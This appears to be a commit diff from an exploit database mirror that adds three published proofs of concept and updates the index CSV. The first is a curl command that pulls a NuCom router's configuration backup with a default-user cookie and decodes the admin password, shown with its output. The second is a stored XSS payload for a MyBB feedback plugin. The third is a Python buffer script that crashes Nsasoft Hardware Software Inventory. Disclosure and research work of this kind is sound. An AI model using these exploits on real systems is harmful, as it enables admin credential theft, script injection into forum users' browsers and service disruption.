DB: 2021-03-12

3 changes to exploits/shellcodes Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC) NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting
2021-03-12 05:02:04 +00:00 · 2021-03-12 05:02:04 +00:00 · f348200ea1
commit f348200ea1
parent 128b9cd185
4 changed files with 112 additions and 0 deletions
--- a/exploits/hardware/webapps/49634.txt
+++ b/exploits/hardware/webapps/49634.txt
@ -0,0 +1,61 @@
 # Exploit Title: NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation
 # Date: 01.03.2021
 # Exploit Author: LiquidWorm
 # Vendor Homepage: https://www.nucom.es
 Vendor: NUEVAS COMUNICACIONES IBERIA, S.A.
 Product web page: https://www.nucom.es
 Affected version: 5.07.90_multi_NCM01
                  5.07.89_multi_NCM01
                  5.07.72_multi_NCM01
 Summary: The NC routers upgrades your network to the next
 generation of WiFi. With combined wireless speeds of up to
 1750 Mbps, the device provides better speeds and wireless
 range. Includes 2 FXS ports for any VoIP service. If you
 prefer a wired connection, the NC routers have gigabit
 ports to provide an incredibly fast, lag-free experience.
 3.0 ports allow you to power a robust home Internet network
 by sharing printers, flash storage, FTP servers, or media
 players.
 Desc: The application suffers from a privilege escalation
 vulnerability. The non-privileged default user (user:user)
 can elevate his/her privileges by sending a HTTP GET request
 to the configuration backup endpoint and disclose the http
 super password (admin credentials) in Base64 encoded value.
 Once authenticated as admin, an attacker will be granted
 access to the additional and privileged pages.
 Tested on: GoAhead-Webs
           Tenda
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2021-5629
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php
 01.03.2021
 --
 lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \
 > curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \
 > -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \
 > grep -oP '(?<=http_supper_passwd=).*' | \
 > base64 -d 2>/dev/null | \
 > xargs echo -n ; \
 > echo -e '\n-----------\n'
 The admin password is: 
 MammaMia123
 -----------
 lqwrm@metalgear:~/prive$
--- a/exploits/php/webapps/49635.txt
+++ b/exploits/php/webapps/49635.txt
@ -0,0 +1,19 @@
 # Exploit Title: MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting
 # Date: 1/30/2021
 # Author: 0xB9
 # Twitter: @0xB9Sec
 # Contact: 0xB9[at]pm.me
 # Software Link: https://community.mybb.com/mods.php?action=view&pid=1220
 # Version: 1.8.22
 # Tested on: Windows 10
 # CVE: CVE-2021-28115
 1. Description:
 This plugin adds a feedback system to your forum. Edit feedback button is vulnerable to XSS.
 2. Proof of Concept:
 - Go to a user profile
 - Add feedback and leave the following payload as comment   "><script>alert(1)</script>
 - View the feedback feedback.php?uid=2 
 - When clicking Edit payload will execute
--- a/exploits/windows/dos/49638.py
+++ b/exploits/windows/dos/49638.py
@ -0,0 +1,29 @@
 # Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
 # Exploit Author : Enes Özeser
 # Exploit Date: 2021-02-28
 # Vendor Homepage : https://www.nsauditor.com/
 # Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe
 # Version: 1.6.4.0
 # Tested on: Windows 10
 # Steps: 
 1- Run the python script. (payload.py)
 2- Open payload.txt and copy content to clipboard.
 3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'. 
 4- Register -> Enter Registeration Code
 5- Paste clipboard into the "Key" or "Name".
 6- Click on OK.
 7- Crashed.
 ---> payload.py <--
 #!/usr/bin/env python
 buffer = "\x41" * 300
 try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print "File created!" 
 except:
    print "File cannot be created!"
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6773,6 +6773,7 @@ id,file,description,date,author,type,platform,port
 49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
 49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
 49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
 49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -43820,3 +43821,5 @@ id,file,description,date,author,type,platform,port
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,
 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,
 49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple,
 49634,exploits/hardware/webapps/49634.txt,"NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation",2021-03-11,LiquidWorm,webapps,hardware,
 49635,exploits/php/webapps/49635.txt,"MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting",2021-03-11,0xB9,webapps,php,